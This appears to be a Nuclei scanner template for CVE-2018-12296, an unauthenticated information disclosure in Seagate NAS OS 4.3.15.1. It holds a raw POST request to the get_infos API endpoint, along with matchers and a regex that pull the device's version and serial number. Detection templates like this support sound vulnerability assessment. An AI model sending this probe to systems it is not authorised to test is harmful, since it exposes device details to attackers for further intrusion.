id: CVE-2018-12296 info: name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure author: princechaddha severity: high description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. impact: | An attacker can gain sensitive information about the server, potentially leading to further attacks. remediation: | Upgrade to a patched version of Seagate NAS OS. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-12296 cwe-id: CWE-732 epss-score: 0.01386 epss-percentile: 0.84924 cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: seagate product: nas_os tags: cve,cve2018,seagate,nasos,disclosure,unauth http: - raw: - | POST /api/external/7.0/system.System.get_infos HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} matchers: - type: word part: body words: - '"version":' - '"serial_number":' condition: and extractors: - type: regex group: 1 regex: - '"version": "([0-9.]+)"' part: body # digest: 4a0a0047304502205c4a803384d6072389dfd9e85f0ed3fe4d8f7d7ef8d42e0ff043ddb9ee75172a022100d5fbabaaa05e77e1c3a24115a1e2c53ea702ff7711706e49c66baec4fe2e45b6:922c64590222798bb761d5b6d8e72950